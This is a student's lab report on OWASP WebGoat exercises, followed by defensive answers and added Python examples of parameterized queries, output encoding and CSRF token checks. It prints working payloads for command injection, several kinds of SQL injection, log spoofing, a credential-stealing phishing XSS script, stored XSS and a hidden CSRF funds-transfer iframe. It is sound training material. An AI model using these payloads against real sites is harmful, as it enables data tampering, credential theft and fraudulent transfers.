PS: I did this experiment twice; during the second run the computer had a small problem and stalled, so the original blog with the result pictures did not get saved...
WebGoat
- WebGoat is a deliberately insecure Java EE web application maintained by the well-known OWASP. Its flaws are not accidental bugs; they are designed on purpose to teach web application security lessons. The application provides a realistic teaching environment and gives hints to help the user complete each lesson.
- Because WebGoat is Java-based it is platform independent and runs on many operating systems; the machine used for this experiment is Kali.
- Run the package by entering the following command on the command line:
java -jar webgoat-container-7.0.1-war-exec.jar
- WebGoat uses port 8080 by default; once the following line appears, the server is ready:
INFO: Starting ProtocolHandler ["http-bio-8080"]
- Open a browser, go to localhost:8080/WebGoat, and log in.
Burpsuite
- Burp Suite is an integrated platform for attacking web applications. It contains a number of tools, with interfaces designed so that the tools work together and the process of testing an application is faster.
- Find the Burp Suite shortcut in the shortcut bar on the left side of the desktop, open it, and click Next until it has started. Go to Proxy, then Options, click Add, configure a port number yourself, remember to tick the listener you have just added, and then click Run:
- Open your browser's settings page and go to Advanced, Network, Settings:
- Fill in the proxy settings as shown (they must match the Burp listener):
- If you need to intercept a page, click Intercept under Proxy to turn it on.
Injection Flaws: Command Injection
- This lesson's page executes a system command and returns the output to the user, so the task is to append a shell command, specifically ifconfig, to the request and have it executed. As in the previous article, use the Burp Suite tool to intercept the request and change its parameter to (mine is):
AccessControlMatrix.help"& ifconfig"
- This makes both commands run; at the bottom of the page you can see the output of ifconfig. Success.
Numeric SQL Injection
- Requirement: use SQL injection so that the weather for every city is returned.
- The idea is simple: construct an always-true condition, and every record is returned.
- You can either modify the request with a tool, as in the previous lesson, or press F12 and edit the page source directly; find the option value and change it to: 101 or 1=1
- Click Go and the weather for all cities is shown. Success.
Log Spoofing
- The lesson asks you to craft an input string: the page echoes the wrong username back into the log, so the goal is to make the log show a line saying that your login succeeded.
- So, construct the following in the username field:
gq%0d%0aLogin Succeeded for username: admin
Lab: SQL Injection, Stage 1: String SQL Injection
- According to the description, you must be able to log in successfully without knowing the password.
- Using SQL syntax, enter:
' or 1='1
- This fails because the input exceeds the allowed character length. Modify the page source (the field's format and length limit) and enter ' or 1='1 again.
- Success.
Stage 2: Parameterized Query #1
Stage 3: Numeric SQL Injection
Stage 4: Parameterized Query #2
String SQL Injection
- Requirement: you must enter the correct last name to log in.
- Because you do not know the password, try the universal key again, following the previous input:
' or 1='1
- Success: because the condition is always true, every user's information is shown.
Database backdoors
- The lesson asks you to use a multi-statement SQL injection to update the data table.
- Following the multi-statement injection exercise from the previous blog, enter the following SQL:
101; update employee set salary=10000
- Every person's salary in the table has been updated to 10000. Success.
- The second step needs no further explanation.
Blind Numeric SQL Injection:
- Numeric blind injection: find the value of the pin field in the record of the pins table whose cc_number field is 1111222233334444.
101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 100 );
- Use this (with > or <) to probe, narrowing the range with the idea of binary search, to reach the final answer: 2364
Blind String SQL Injection:
- String blind injection: find the value of the pin field in the record of the pins table whose cc_number field is 4321432143214321. The pin field is of type varchar.
- This is the same as the previous lesson, guessing the ASCII value of each character; the answer is jill.
Cross-Site Scripting (XSS): Phishing with XSS
- Phishing with XSS: the lesson requires creating a form that tricks the visitor into entering a username and password and submits them to http://localhost:8080/WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE
- The following is a code example:
</form>
<script>
function hack() {
  // Send the typed credentials to the catcher endpoint by requesting an image URL
  var xssimage = new Image();
  xssimage.src = "http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value;
  alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br><br><hr><h3>This feature requires account login:</h3><br><br>
Enter Username:<br><input type="text" name="user"><br>
Enter Password:<br><input type="password" name="pass"><br>
<input type="submit" name="login" value="login" onclick="hack()">
</form><br><br><hr>
Stored XSS Attacks
- A stored XSS attack: the lesson requires embedding a web page element or a popup in a message.
- Here is how it is done:
- The title can be anything; from the first attempt you can see that the message is saved as a hyperlink in this page, and clicking it shows the message content.
- In the message body you can embed a piece of JS code that is triggered when a user clicks the message, for example:
<script>alert("5234 attack succeed!");</script>
Cross Site Request forgery (CSRF)
- Here is an example that combines stored XSS and CSRF: CSRF impersonates a logged-in user and forges a request on their behalf.
- The CSRF code is stored on the page through the stored XSS: enter the following malicious code in the message body:
<iframe src="attack?Screen=504&menu=900&transferFunds=5000"></iframe>
- When a user clicks this message it is triggered, and the page shows that 5000 yuan has been transferred.
- Note: the values of the Screen and menu parameters above must match the ones shown on the right side of the site.
- If you want the user not to notice the iframe, set its width and height to 1 pixel so that it is invisible.
Answer questions after the experiment
- (1) The principle of SQL injection attacks and how to defend against them
Principle: the basic principle of SQL injection is that specially crafted illegal input is submitted through the client's legitimate interface; it is injected into the business SQL that the server executes, changing the original logic of the SQL statement and affecting the server's normal business processing.
Defense:
- Validate input before executing the SQL statement;
- Use regular expressions to filter out special characters;
- Use PreparedStatement instead of Statement;
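As an added illustration of the three defenses above (this is not code from the page or from WebGoat), the Numeric SQL Injection lesson's always-true payload 101 or 1=1 is run against a constructed weather table, first with Statement-style string concatenation and then with parameter binding, which is what Java's PreparedStatement does; Python's sqlite3 stands in for the Java code, and the table contents are made up.

```python
import re
import sqlite3

# Constructed stand-in for the lesson's weather table (not WebGoat's real schema or data).
WEATHER_ROWS = [(101, "Columbia"), (102, "Seattle"), (103, "New York")]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE weather_data (station INTEGER, city TEXT)")
    conn.executemany("INSERT INTO weather_data VALUES (?, ?)", WEATHER_ROWS)
    return conn

def lookup_vulnerable(conn, station):
    # Statement style: the user's text is pasted into the SQL grammar, so
    # "101 or 1=1" turns the WHERE clause into an always-true condition.
    sql = "SELECT station, city FROM weather_data WHERE station = " + station + " ORDER BY station"
    return conn.execute(sql).fetchall()

def is_valid_station(station):
    # Defenses 1 and 2: validate with a whitelist regex before touching the database;
    # anything other than plain digits (spaces, quotes, keywords) is rejected.
    return re.fullmatch(r"[0-9]{1,6}", station) is not None

def lookup_parameterized(conn, station):
    # Defense 3 (the PreparedStatement equivalent): the value is bound as data and
    # never parsed as SQL, so an injected "or 1=1" is just text that matches nothing.
    sql = "SELECT station, city FROM weather_data WHERE station = ? ORDER BY station"
    return conn.execute(sql, (station,)).fetchall()

def lookup_safe(conn, station):
    # Both layers combined: validate first, then bind the integer.
    if not is_valid_station(station):
        return []
    return lookup_parameterized(conn, int(station))
```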
- (2) The principle of XSS attacks and how to defend against them
Principle: the main purpose of an XSS attack is to find a way to obtain the cookie of the target website. Because the cookie is equivalent to the session, anyone holding it can access the site from any Internet-connected PC, log in as the victim, and do damage.
Defense:
- When untrusted input is displayed as the content of a tag: in places where HTML input is not needed, filter HTML tags and special characters (" < > & and so on) and convert them into entities that the browser does not interpret.
- When untrusted input is displayed as a tag attribute, an attacker can use a " to close the attribute and start new attributes or malicious event handlers: both single and double quotes in the attribute value must be encoded, user-supplied HTML tags and attributes should be whitelisted, and tags and attributes known to be dangerous can be filtered specifically.
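Added example (not from the page or from WebGoat) of the two defenses above in Python: the payload from the Stored XSS lesson is rendered with entity encoding as element content and inside an attribute, and a small tag whitelist that drops all attributes is applied where a little formatting is allowed. The message-board layout in render_message and the ALLOWED_TAGS set are assumptions.

```python
import html
import re

# Constructed sample: the payload from the Stored XSS lesson above.
STORED_MESSAGE = '<script>alert("5234 attack succeed!");</script>'
ALLOWED_TAGS = {"b", "i", "br"}  # tags a message may keep; everything else is shown as text

def render_text(value):
    """Untrusted text as element content: < > & and both quote characters become
    entities, so the browser never interprets the value as markup."""
    return html.escape(value, quote=True)

def render_attr(name, value):
    """Untrusted text inside a double-quoted attribute: encoding the quotes means the
    value cannot close the attribute and start a new one (such as an event handler)."""
    return '%s="%s"' % (name, html.escape(value, quote=True))

def sanitize_whitelist(fragment):
    """Keep only whitelisted tags, stripped of every attribute; escape all other tokens
    (unknown tags are shown literally rather than silently removed)."""
    out = []
    for token in re.split(r"(<[^>]*>)", fragment):
        m = re.fullmatch(r"<(/?)([A-Za-z0-9]+)[^>]*>", token)
        if m and m.group(2).lower() in ALLOWED_TAGS:
            out.append("<%s%s>" % (m.group(1), m.group(2).lower()))
        else:
            out.append(html.escape(token, quote=True))
    return "".join(out)

def render_message(title, body):
    """One message-board entry as the lesson shows it: the title as link text and as a
    title attribute, the body as content. Each value is encoded for its own context."""
    return '<a href="#" %s>%s</a><p>%s</p>' % (
        render_attr("title", title), render_text(title), sanitize_whitelist(body))
```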
- (3) The principle of CSRF attacks and how to defend against them
Principle: the main purpose of a CSRF attack is to make users unknowingly attack a system they are already logged into; it is similar to phishing.
Defense:
- Check user submissions with a Referer check, a token, or a verification code.
- Try not to expose the user's private information in page links.
- Use POST for actions such as modification and deletion.
- Avoid general-purpose cookies and set the cookie Domain strictly.
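Added example (not code from the page or from WebGoat) showing how the defenses above would reject the lesson's forged transferFunds request: state changes are POST only, the request must carry the session's token, any Referer must be same-origin, and the session cookie is narrowly scoped. The request dict shape, the transfer_allowed function and the cookie attributes are assumptions; JSESSIONID is the servlet container's session cookie name.

```python
import hmac
import secrets
from urllib.parse import urlparse

SITE_ORIGIN = "http://localhost:8080"  # the WebGoat origin used on this page

def new_session():
    # One unguessable token per login session; the real transfer form carries it
    # in a hidden field, and it never appears in a URL.
    return {"csrf_token": secrets.token_hex(16)}

def transfer_allowed(session, request):
    """Decide whether a transferFunds request may run. `request` is a constructed dict
    with keys method, form and headers. Returns (ok, reason)."""
    # State-changing actions are POST only, so the lesson's <iframe src="attack?...
    # &transferFunds=5000"> (a GET) is refused before anything else is looked at.
    if request["method"] != "POST":
        return False, "state change must use POST"
    # The token must match the session's; compare_digest avoids a timing side channel.
    token = request.get("form", {}).get("csrf_token", "")
    if not hmac.compare_digest(token, session["csrf_token"]):
        return False, "missing or wrong CSRF token"
    # If a Referer is present, it must come from our own origin.
    referer = request.get("headers", {}).get("Referer")
    if referer is not None:
        ref = urlparse(referer)
        if "%s://%s" % (ref.scheme, ref.netloc) != SITE_ORIGIN:
            return False, "cross-origin Referer"
    return True, "ok"

def session_cookie(session_id):
    # A narrowly scoped session cookie instead of a general-purpose one: no Domain
    # attribute (host-only, the strictest scope), limited to the app path, hidden from
    # script, and not sent by the browser on cross-site requests.
    return "JSESSIONID=%s; Path=/WebGoat; HttpOnly; SameSite=Strict" % session_id

# Constructed requests: the lesson's forged GET, and a legitimate POST from the site's form.
FORGED_GET = {"method": "GET", "form": {"transferFunds": "5000"}, "headers": {}}

def legit_post(session):
    return {"method": "POST",
            "form": {"transferFunds": "5000", "csrf_token": session["csrf_token"]},
            "headers": {"Referer": SITE_ORIGIN + "/WebGoat/attack?Screen=504&menu=900"}}
```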
20145234 Huangfei, "Network Countermeasure Technology" Experiment 9: Web Security Basic Practice